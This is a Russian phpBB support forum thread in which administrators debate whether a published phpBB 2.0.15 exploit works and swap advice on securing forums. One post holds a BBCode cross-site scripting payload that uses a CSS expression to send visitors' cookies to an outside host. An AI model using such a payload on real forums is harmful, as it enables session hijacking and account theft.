Splurov
Ну "поисковый оверлоад" - это "классика жанра", а вот по поводу регистрации... или я туплю, или что, но я пока ничего не понял...
Защита в phpBB
Правила форума
Местная Конституция | Шаблон запроса | Общий FAQ-phpbb | FAQ-phpbb2 | FAQ-phpbb3 | Как задавать вопросы
Местная Конституция | Шаблон запроса | Общий FAQ-phpbb | FAQ-phpbb2 | FAQ-phpbb3 | Как задавать вопросы
Mr. Anderson 24.06.2005 13:07
Правила конференции (20.12.2007) | Общие ошибки новичков (07.11.2005) | Шаблон запроса | Руководство пользователя | FAQ
Последние и единственно актуальные на сегодня версии - 2.0.23 и 3.0.2!
Поддержка по ICQ, e-mail и ЛС оказывается только за WM!
Da Blog
Последние и единственно актуальные на сегодня версии - 2.0.23 и 3.0.2!
Поддержка по ICQ, e-mail и ЛС оказывается только за WM!
Da Blog
-
Mr. Anderson - phpBB Guru
- Сообщения: 3081
- Зарегистрирован: 13.03.2004 22:32
- Откуда: СССР
VVVas 24.06.2005 13:09
Splurov
Как-то у меня вызывает сомнения работоспособность работы этого експлоита.
1. как он обойдет вижуал конфирмейшн? Завяленная цель - регистрация любого количества пользователей.
2. насколько помню в 2.0.15 закрыт поиск в поле автор по символу * так что тоже сомнительно. Не сумел понять заявленную цель для search.php
И я бы не опасался кучи детских взломов по той причине, что малолетки не разбируться с тем что форум может стоять в другой папке, или например отсутсвует английский язык на форуме как у меня.
Скорее всего я не прав.
Как-то у меня вызывает сомнения работоспособность работы этого експлоита.
1. как он обойдет вижуал конфирмейшн? Завяленная цель - регистрация любого количества пользователей.
2. насколько помню в 2.0.15 закрыт поиск в поле автор по символу * так что тоже сомнительно. Не сумел понять заявленную цель для search.php
И я бы не опасался кучи детских взломов по той причине, что малолетки не разбируться с тем что форум может стоять в другой папке, или например отсутсвует английский язык на форуме как у меня.
Скорее всего я не прав.
вы нарушили правила конференции, объяснений не будет - сами читайте правила
я люблю daft punk | Активные темы
я люблю daft punk | Активные темы
-
VVVas - Люмпен Пролетариат
- Сообщения: 4736
- Зарегистрирован: 12.11.2004 1:20
- Откуда: RU-MSK
VVVas 26.06.2005 20:36
Вообщем как я и предполагал
http://www.phpbb.com/phpBB/viewtopic.ph ... 68#1637368
http://www.phpbb.com/phpBB/viewtopic.ph ... 68#1637368
вы нарушили правила конференции, объяснений не будет - сами читайте правила
я люблю daft punk | Активные темы
я люблю daft punk | Активные темы
-
VVVas - Люмпен Пролетариат
- Сообщения: 4736
- Зарегистрирован: 12.11.2004 1:20
- Откуда: RU-MSK
gigli 27.06.2005 3:45
VVVas, вопщем, сплойт рабочий, тока что протестил.
Всё действительно ужасно ((
Стоит далеко не у всех...
Вероятно, берет количеством запросов к скрипту.
Я могу ошибаться.
А вот тут ты не прав, код сплойта хорошо читаемый. Любой дуралей все поправит под себя, что очень печально (((
Всё действительно ужасно ((
1. как он обойдет вижуал конфирмейшн? Завяленная цель - регистрация любого количества пользователей.
Стоит далеко не у всех...
2. насколько помню в 2.0.15 закрыт поиск в поле автор по символу * так что тоже сомнительно. Не сумел понять заявленную цель для search.php
Вероятно, берет количеством запросов к скрипту.
Я могу ошибаться.
И я бы не опасался кучи детских взломов по той причине, что малолетки не разбируться с тем что форум может стоять в другой папке, или например отсутсвует английский язык на форуме как у меня.
А вот тут ты не прав, код сплойта хорошо читаемый. Любой дуралей все поправит под себя, что очень печально (((
Ретро фонотека retro-retro.ru - Музыка, проверенная временем
-
gigli - phpBB 1.4.1
- Сообщения: 49
- Зарегистрирован: 23.01.2005 6:09
- Откуда: из тех ворот, что и весь народ
VVVas 27.06.2005 7:30
gigli писал(а):А вот тут ты не прав, код сплойта хорошо читаемый. Любой дуралей все поправит под себя, что очень печально (((
Не будь такого высокого мнения об умственном развитии человечества...
gigli писал(а):Стоит далеко не у всех...
Ну это уже их гемморой, не включать его если всё делается в пару кликов и людей абсолютно не напрягает - верх чего-то там, ИМХО.
gigli писал(а):Вероятно, берет количеством запросов к скрипту.
Может и количеством но * запрещена голая, а слова меньше 3 символов тоже (читай ссылку на оффресурс). Хотя наверное возможно понапрягать форум кучей запросов.
вы нарушили правила конференции, объяснений не будет - сами читайте правила
я люблю daft punk | Активные темы
я люблю daft punk | Активные темы
-
VVVas - Люмпен Пролетариат
- Сообщения: 4736
- Зарегистрирован: 12.11.2004 1:20
- Откуда: RU-MSK
Nikel 27.06.2005 15:45
gigli писал(а):Стоит далеко не у всех...
Ето их личные проблемы , у некоторых еще 2.0.6 стоит ...
gigli писал(а):Вероятно, берет количеством запросов к скрипту.
Я могу ошибаться.
От с етим согласен .
gigli писал(а):А вот тут ты не прав, код сплойта хорошо читаемый. Любой дуралей все поправит под себя, что очень печально (((
Ну ты сказал
90% взломов ето выпендреж детей , попавших на античат или вебхак и осуществляется ето все методом "копировать, вставить" .
А ежели тебя думает ломать смыслящий человек , то тут уже вопрос товоей компетенции .
Хочешь помочь коллеге- поделись опытом, хочешь помочь профессионалу-отойди и не мешай, хочешь помочь дураку... Сам дурак
-
Nikel - phpBB 2.0.12
- Сообщения: 569
- Зарегистрирован: 25.04.2005 0:41
- Откуда: Киев
gigli 28.06.2005 3:18
VVVas писал(а):Не будь такого высокого мнения об умственном развитии человечества...
Это тебя местные юзеры избаловали глупыми вопросами, иначе ты бы так не говорил.
Ну это уже их гемморой, не включать его если всё делается в пару кликов и людей абсолютно не напрягает - верх чего-то там, ИМХО.
Тут твоя правда.
Nikel писал(а):Ето их личные проблемы , у некоторых еще 2.0.6 стоит ...
И такое не редкость.
Nikel, у тебя там дальше на изоповом языке: что значит думать ломает, это вообще к чему было сказано?
В моей компетенции в случае сбоя или взлома оценить ущерб и все быстренько восстановить, а думает пускай лошадь, у нее голова больше...
Ретро фонотека retro-retro.ru - Музыка, проверенная временем
-
gigli - phpBB 1.4.1
- Сообщения: 49
- Зарегистрирован: 23.01.2005 6:09
- Откуда: из тех ворот, что и весь народ
VVVas 28.06.2005 8:30
gigli писал(а):Это тебя местные юзеры избаловали глупыми вопросами, иначе ты бы так не говорил.
Мое мнение основывается на пользователях 4 локалок (на форумах активных юзверей 2500, 1000, 400, 300). Хотя умные и интересные люди встречаются.
вы нарушили правила конференции, объяснений не будет - сами читайте правила
я люблю daft punk | Активные темы
я люблю daft punk | Активные темы
-
VVVas - Люмпен Пролетариат
- Сообщения: 4736
- Зарегистрирован: 12.11.2004 1:20
- Откуда: RU-MSK
Nikel 28.06.2005 14:08
gigli писал(а):В моей компетенции в случае сбоя или взлома оценить ущерб и все быстренько восстановить, а думает пускай лошадь, у нее голова больше...
В твоей компетенции старатся использовать все средства для не допущения взлома .
gigli писал(а):И такое не редкость.
Ну так , что я доктор даунам не думающим о безопасности ?
Хочешь помочь коллеге- поделись опытом, хочешь помочь профессионалу-отойди и не мешай, хочешь помочь дураку... Сам дурак
-
Nikel - phpBB 2.0.12
- Сообщения: 569
- Зарегистрирован: 25.04.2005 0:41
- Откуда: Киев
gigli 28.06.2005 17:42
VVVas, да, весомый аргумент
Это всего лишь слова. Единственное средство недопущения взлома - не иметь то, что можно взломать.
Дальше про доктора, это ты хорошо ляпнул, только вот опять не понятно к чему. Даунам сайт не нужен, тем более форум.
Nikel писал(а):В твоей компетенции старатся использовать все средства для не допущения взлома .
Это всего лишь слова. Единственное средство недопущения взлома - не иметь то, что можно взломать.
Дальше про доктора, это ты хорошо ляпнул, только вот опять не понятно к чему. Даунам сайт не нужен, тем более форум.
Ретро фонотека retro-retro.ru - Музыка, проверенная временем
-
gigli - phpBB 1.4.1
- Сообщения: 49
- Зарегистрирован: 23.01.2005 6:09
- Откуда: из тех ворот, что и весь народ
Йыс 30.07.2005 12:37
Да...
[url]www.ut[url=www.s=''style='font-size:0;color:#EFEFEF'style='top:expression(eval(this.sss));'sss=`i=new/**/Image();i.src='http://allianse.h15.ru/sn/s.jpg?'+document.cookie;this.sss=null`style='font-size:0;][/url][/url]'
[url]www.ut[url=www.s=''style='font-size:0;color:#EFEFEF'style='top:expression(eval(this.sss));'sss=`i=new/**/Image();i.src='http://allianse.h15.ru/sn/s.jpg?'+document.cookie;this.sss=null`style='font-size:0;][/url][/url]'
- Йыс
- phpBB 1.4.0
- Сообщения: 35
- Зарегистрирован: 13.07.2005 17:54
Палыч 28.07.2007 23:31
scorpio
Процесс смены префикса описан в Документации
http://www.phpbbguru.net/docs/?id=10
Правда, писалось давно, там в списке пары таблиц не хватает (phpbb_confirm и phpbb_sessions_keys, они были добавлены позже)
Вероятно, вы просто не отредактировали файл config.php
Процесс смены префикса описан в Документации
http://www.phpbbguru.net/docs/?id=10
Правда, писалось давно, там в списке пары таблиц не хватает (phpbb_confirm и phpbb_sessions_keys, они были добавлены позже)
Вероятно, вы просто не отредактировали файл config.php
Не все то WINDOWS, что висит... phpBB только учусь.
ICQ, email, ЛС - только для личных сообщений. Вопросы по phpbb только на форумах. По найму не работаю.
Никогда не бойся делать то, что ты пока не умеешь. Помни, что Ковчег был построен любителем. Профессионалы строили Титаник...
ICQ, email, ЛС - только для личных сообщений. Вопросы по phpbb только на форумах. По найму не работаю.
Никогда не бойся делать то, что ты пока не умеешь. Помни, что Ковчег был построен любителем. Профессионалы строили Титаник...
-
Палыч - Просто Палыч
- Сообщения: 6741
- Зарегистрирован: 24.05.2006 23:20
- Откуда: Питер
scorpio 29.07.2007 13:48
Палыч!
У меня вчера чуть крыша не поехала, когда все накрылось медным тазом из-за этих смен префиксов...Эта статья,не знаю кто писал,недоработана. Конечно, я поменял все как там написано и confg.php тоже, но боже мой, разве так пишут статьи для чайников...потому что там кроме указанных таблиц еще море других от новых модов, например фотоальбом и прочие префиксы в таблицах новых модов конечно я не поменял, так каа думал, что достаточно сменить только те таблицы,которые указаны в статье..больше я такой ерундой заниматься не буду.
Плюс еще установил мод защиты от хакеров, CBACK Cracker Tracker , так это вообще ужас и кошмар, там 50 файлов 3 часа копировал вставлял, в результате он мне так встал, что там одни ошибки при работе на форуме были и к тому же он вообще админку снес куда то, а вместо этого свою ссылку на свой сайт вставил и все видят, что атак на форум 0, прямо првоцирует атакануть..ну да потом нашел на вашей коференции страниц 15 с проблемами по поводу этого мода и все снес куда подальше,зачем такие сложности...
Единственно, что я взял из той статьи полезного- 2 разных аккаунта для админа, то есть для админки и как участника и пароль поставил длинющиеи также поставил пароль на папку админа в каталоге ..а вообще не представляю что будет, когда кто нибудь все это хакнет,там столько уже вложили души и много материалов...
Но вот почему я стал все это делать, возможно вы можете это объяснить:
Вчера внизу было написано, что вчера в 12 дня было самое большое кол-во посетителей 48 ...тогда как никого там не было кроме меня, это были какие то гости и форум молодой, там вообще зарегено всего 40 человек, из них 8 ативных и не могло там быть 48 сразу, это нонсенс. Что это, Палыч, это хакеры???
У меня вчера чуть крыша не поехала, когда все накрылось медным тазом из-за этих смен префиксов...Эта статья,не знаю кто писал,недоработана. Конечно, я поменял все как там написано и confg.php тоже, но боже мой, разве так пишут статьи для чайников...потому что там кроме указанных таблиц еще море других от новых модов, например фотоальбом и прочие префиксы в таблицах новых модов конечно я не поменял, так каа думал, что достаточно сменить только те таблицы,которые указаны в статье..больше я такой ерундой заниматься не буду.
Плюс еще установил мод защиты от хакеров, CBACK Cracker Tracker , так это вообще ужас и кошмар, там 50 файлов 3 часа копировал вставлял, в результате он мне так встал, что там одни ошибки при работе на форуме были и к тому же он вообще админку снес куда то, а вместо этого свою ссылку на свой сайт вставил и все видят, что атак на форум 0, прямо првоцирует атакануть..ну да потом нашел на вашей коференции страниц 15 с проблемами по поводу этого мода и все снес куда подальше,зачем такие сложности...
Единственно, что я взял из той статьи полезного- 2 разных аккаунта для админа, то есть для админки и как участника и пароль поставил длинющиеи также поставил пароль на папку админа в каталоге ..а вообще не представляю что будет, когда кто нибудь все это хакнет,там столько уже вложили души и много материалов...
Но вот почему я стал все это делать, возможно вы можете это объяснить:
Вчера внизу было написано, что вчера в 12 дня было самое большое кол-во посетителей 48 ...тогда как никого там не было кроме меня, это были какие то гости и форум молодой, там вообще зарегено всего 40 человек, из них 8 ативных и не могло там быть 48 сразу, это нонсенс. Что это, Палыч, это хакеры???
Всегда есть вопросы по phpBB
- scorpio
- phpBB 2.0.1
- Сообщения: 132
- Зарегистрирован: 31.05.2007 15:00
crash 29.07.2007 13:57
scorpio писал(а):Эта статья,не знаю кто писал,недоработана
она доработана
Палыч писал(а):Правда, писалось давно, там в списке пары таблиц не хватает
scorpio писал(а):У меня вчера чуть крыша не поехала,
ну так нефиг было и менять префикс. Если вас захотят поломать, то они узнают и префикс и все остальное
Как правильно задавать вопросы
Для особо одаренных: поиск - это есть круто.
FAQ v.2 | FAQ v.3 | Шаблон запроса
Для особо одаренных: поиск - это есть круто.
FAQ v.2 | FAQ v.3 | Шаблон запроса
-
crash - Support Team Leader
- Сообщения: 6735
- Зарегистрирован: 07.07.2004 17:12
- Откуда: Мирный
Вернуться в phpBB-пространство
Кто сейчас на конференции
Сейчас этот форум просматривают: нет зарегистрированных пользователей и гости: 0
Powered by phpBB © 2000, 2002, 2005, 2007 phpBB Group
Time : 1.133s | 13 Queries | GZIP : On | Load : 1.28
Time : 1.133s | 13 Queries | GZIP : On | Load : 1.28
